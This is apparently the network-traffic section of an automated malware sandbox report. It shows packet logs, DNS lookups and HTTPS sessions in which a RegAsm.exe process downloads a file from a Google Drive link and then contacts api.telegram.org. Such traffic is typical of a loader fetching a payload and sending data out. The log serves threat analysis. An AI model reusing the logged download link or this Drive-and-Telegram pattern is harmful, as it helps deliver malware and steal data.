                                                                        Sep 14, 2021 18:41:17.212364912 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.212795019 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.213222980 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.213283062 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.213303089 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.213363886 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.214107037 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.214198112 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.214224100 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.214302063 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.215080976 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.215169907 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.215204954 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.215275049 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.215912104 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.215991020 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.216013908 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.216079950 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.216893911 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.216985941 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.217005014 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.217067957 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.217721939 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.218344927 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.218358994 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.218421936 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.218658924 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.218724012 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.218744993 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.218813896 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.218832016 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.218883038 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.219511032 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.219587088 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.219608068 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.219666004 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.220097065 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.220166922 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.220191002 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.220276117 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.220303059 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.220372915 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.221074104 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.221158028 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.221162081 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.221215010 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.221225023 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.221267939 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.221942902 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.222012997 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.222028017 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.222045898 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.222151041 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.222811937 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.222873926 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.222898960 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.222956896 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.222970009 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.223021984 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.223653078 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.223731995 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.223748922 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.223812103 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.223825932 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.223877907 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.224523067 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.224586010 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.224826097 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.224884033 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.224900961 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.224970102 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.224987030 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.225042105 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.225667953 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.225737095 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.225759029 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.225816965 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.225828886 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.225883961 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.226412058 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.226476908 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.226499081 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.226557970 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.226568937 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.226623058 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.227298975 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.227370024 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.227392912 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.227448940 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.227461100 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.227516890 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.228058100 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.228142977 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.228152037 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.228171110 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.228241920 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.228255987 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.228863955 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.228938103 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.228960991 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.229020119 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.229031086 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.229083061 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.229737043 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.229832888 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.229875088 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.229898930 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.229935884 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.229947090 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.229959011 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.230036020 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.230434895 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.230487108 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.230509996 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.230561972 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.230578899 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.230624914 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.231179953 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.231240988 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.231262922 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.231322050 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.231338978 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.231384039 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.231867075 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.231940031 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.231962919 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.232018948 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.232021093 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.232038021 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.232073069 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.232088089 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.232837915 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.232908010 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.232928991 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.232980013 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.232984066 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.233007908 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.233026028 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.233067989 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.233808041 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.233870983 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.233891010 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.233942032 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.233952999 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.233977079 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.233995914 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.234030008 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.234770060 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.234827995 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.234850883 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.234904051 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.234908104 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.234925985 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.234946966 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.234976053 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.235722065 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.235785007 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.235807896 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.235865116 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.235883951 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.235934973 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.235935926 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.235953093 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.235989094 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.236011028 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.236623049 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.236706018 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.236870050 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.236922026 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.236943960 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.236995935 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.237015009 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.237071991 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.237092018 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.237137079 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.237771034 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.237840891 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.237862110 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.237927914 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.237941980 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.238001108 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.238848925 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:41:17.240227938 CEST44349839172.217.168.65192.168.2.4
                                                                        Sep 14, 2021 18:41:17.240324020 CEST49839443192.168.2.4172.217.168.65
                                                                        Sep 14, 2021 18:42:56.357392073 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.357430935 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.358822107 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.363820076 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.363843918 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.428647995 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.428853989 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.433063030 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.433073044 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.433648109 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.440440893 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.476553917 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.479547024 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.523159027 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.894925117 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.897020102 CEST49840443192.168.2.4149.154.167.220
                                                                        Sep 14, 2021 18:42:56.897049904 CEST44349840149.154.167.220192.168.2.4
                                                                        Sep 14, 2021 18:42:56.897134066 CEST49840443192.168.2.4149.154.167.220

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Sep 14, 2021 18:36:53.400593042 CEST6238953192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:36:53.431893110 CEST53623898.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:26.172319889 CEST4991053192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:26.218472958 CEST53499108.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:42.836487055 CEST5585453192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:42.863136053 CEST53558548.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:46.252813101 CEST6454953192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:46.322527885 CEST53645498.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:47.049464941 CEST6315353192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:47.082562923 CEST53631538.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:47.536254883 CEST5299153192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:47.569142103 CEST53529918.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:47.893361092 CEST5370053192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:47.934828043 CEST53537008.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:48.378473997 CEST5172653192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:48.408154011 CEST53517268.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:49.031199932 CEST5679453192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:49.076150894 CEST53567948.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:49.172090054 CEST5653453192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:49.211971045 CEST53565348.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:49.470839977 CEST5662753192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:49.499596119 CEST53566278.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:50.183506012 CEST5662153192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:50.208632946 CEST53566218.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:51.264286995 CEST6311653192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:51.290956974 CEST53631168.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:37:51.990253925 CEST6407853192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:37:52.031847954 CEST53640788.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:38:04.459747076 CEST6480153192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:38:04.488055944 CEST53648018.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:38:30.179734945 CEST6172153192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:38:30.223356962 CEST53617218.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:41:15.583697081 CEST5125553192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:41:15.628441095 CEST53512558.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:41:16.621764898 CEST6152253192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:41:16.657521963 CEST53615228.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:42:56.229713917 CEST5233753192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:42:56.256963015 CEST53523378.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:44:06.179713011 CEST5504653192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:44:06.218039989 CEST53550468.8.8.8192.168.2.4
                                                                        Sep 14, 2021 18:44:07.245057106 CEST4961253192.168.2.48.8.8.8
                                                                        Sep 14, 2021 18:44:07.294460058 CEST53496128.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Sep 14, 2021 18:41:15.583697081 CEST192.168.2.48.8.8.80xa9a7Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                        Sep 14, 2021 18:41:16.621764898 CEST192.168.2.48.8.8.80x44bdStandard query (0)doc-0o-00-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                        Sep 14, 2021 18:42:56.229713917 CEST192.168.2.48.8.8.80x4b72Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Sep 14, 2021 18:41:15.628441095 CEST8.8.8.8192.168.2.40xa9a7No error (0)drive.google.com172.217.168.78A (IP address)IN (0x0001)
                                                                        Sep 14, 2021 18:41:16.657521963 CEST8.8.8.8192.168.2.40x44bdNo error (0)doc-0o-00-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                        Sep 14, 2021 18:41:16.657521963 CEST8.8.8.8192.168.2.40x44bdNo error (0)googlehosted.l.googleusercontent.com172.217.168.65A (IP address)IN (0x0001)
                                                                        Sep 14, 2021 18:42:56.256963015 CEST8.8.8.8192.168.2.40x4b72No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                        Sep 14, 2021 18:44:06.218039989 CEST8.8.8.8192.168.2.40xae99No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • drive.google.com
                                                                        • doc-0o-00-docs.googleusercontent.com
                                                                        • api.telegram.org

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449838172.217.168.78443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-09-14 16:41:16 UTC0OUTGET /uc?export=download&id=1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: CONSENT=YES+GB.en-GB+V9+BX; ANID=AHWqTUlSr3088pwoykfOo43D99cbT1sB7DrGAvl1SaoiUj9-jegdSaaNEmuC6sED
                                                                        2021-09-14 16:41:16 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Tue, 14 Sep 2021 16:41:16 GMT
                                                                        Location: https://doc-0o-00-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4l47miito3jg5v0470e1itperpsq7fa1/1631637675000/05708870864161384939/*/1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS?e=download
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Content-Security-Policy: script-src 'nonce-6hoXi9+Py46PqxKsBJZbSA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Server: GSE
                                                                        Set-Cookie: NID=223=mSSEnN8xmdRJg7-r78btZGY79Qiq14Ul1n7Wdc2LCADIidcqzaOaItc3Osc2vUp6vRgql8gutohuZj-_i-X4dwlXqMiDx6LOgUtanp2wzuNKH_-QYADSWhTdbl8lfooEiriW4iwD6cVCT7ld2l9EY2vNwQOtd2CYYZBUjP-TrCc; expires=Wed, 16-Mar-2022 16:41:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                        Accept-Ranges: none
                                                                        Vary: Accept-Encoding
                                                                        Connection: close
                                                                        Transfer-Encoding: chunked
                                                                        2021-09-14 16:41:16 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 6f 2d 30 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 34 6c 34 37
                                                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0o-00-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4l47
                                                                        2021-09-14 16:41:16 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.449839172.217.168.65443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        2021-09-14 16:41:16 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4l47miito3jg5v0470e1itperpsq7fa1/1631637675000/05708870864161384939/*/1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS?e=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                        Cache-Control: no-cache
                                                                        Host: doc-0o-00-docs.googleusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2021-09-14 16:41:17 UTC2INHTTP/1.1 200 OK
                                                                        X-GUploader-UploadID: ADPycdt9UqFDjrzXgVdLflzonZYk75CEok_SueVq01mdbTfKJOk4kEZ_j9qgjQUOvjFLMt7MUDxjgP7rjfBMxEyW4dM
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Credentials: false
